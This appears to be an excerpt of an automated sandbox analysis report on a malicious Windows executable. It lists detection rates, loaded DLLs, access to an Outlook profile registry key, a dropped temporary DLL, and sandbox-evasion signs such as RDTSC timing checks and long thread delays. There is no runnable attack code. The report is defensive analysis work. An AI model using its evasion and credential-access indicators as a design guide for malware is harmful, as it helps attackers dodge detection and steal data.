            Source: 9Yn5tjyOgT.exeVirustotal: Detection: 76%
            Source: 9Yn5tjyOgT.exeReversingLabs: Detection: 65%
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeFile read: C:\Users\user\Desktop\9Yn5tjyOgT.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\9Yn5tjyOgT.exe "C:\Users\user\Desktop\9Yn5tjyOgT.exe"
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess created: C:\Users\user\Desktop\9Yn5tjyOgT.exe "C:\Users\user\Desktop\9Yn5tjyOgT.exe"
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess created: C:\Users\user\Desktop\9Yn5tjyOgT.exe "C:\Users\user\Desktop\9Yn5tjyOgT.exe"Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: 9Yn5tjyOgT.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2773955750.00000000070E9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3405749429.0000000005439000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 0_2_738E1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_738E1B5F
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_3_001949CC push eax; iretd 6_3_001949CD
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeFile created: C:\Users\user\AppData\Local\Temp\nsr3ABB.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeAPI/Special instruction interceptor: Address: 768C8E3
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeAPI/Special instruction interceptor: Address: 59DC8E3
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeRDTSC instruction interceptor: First address: 765096C second address: 765096C instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F0D2874FBEAh 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeRDTSC instruction interceptor: First address: 59A096C second address: 59A096C instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F0D2880040Ah 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeMemory allocated: 36CF0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeMemory allocated: 36AD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 599884Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 599539Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 599438Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 598953Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 598844Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 598719Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 598610Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 598485Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 598360Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 598235Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 598110Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 597985Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 597860Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 597735Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 597610Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 597485Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 597360Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 597222Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 597110Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 596999Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 596846Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 596725Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 596594Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 596452Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 596344Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 596235Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 596110Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 595985Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 595860Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 595735Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 595610Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 595485Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 595360Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 595235Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 595110Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 594985Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 594826Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 594719Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 594610Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 594485Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 594360Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 594235Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 594110Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 593985Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 593860Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 593735Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 593610Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 593485Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeWindow / User API: threadDelayed 1576Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeWindow / User API: threadDelayed 8229Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsr3ABB.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeAPI coverage: 4.2 %
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep count: 41 > 30Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -37815825351104557s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 1592Thread sleep count: 1576 > 30Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -599884s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 1592Thread sleep count: 8229 > 30Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -599539s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -599438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep count: 31 > 30Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -599313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -599188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -599063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -598953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -598844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -598719s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -598610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -598485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -598360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -598235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -598110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -597985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -597860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -597735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -597610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -597485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -597360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -597222s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -597110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -596999s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -596846s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -596725s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -596594s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -596452s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -596344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -596235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -596110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -595985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -595860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -595735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -595610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -595485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -595360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -595235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -595110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -594985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -594826s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -594719s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -594610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -594485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -594360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -594235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -594110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -593985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -593860s >= -30000sJump to behavior
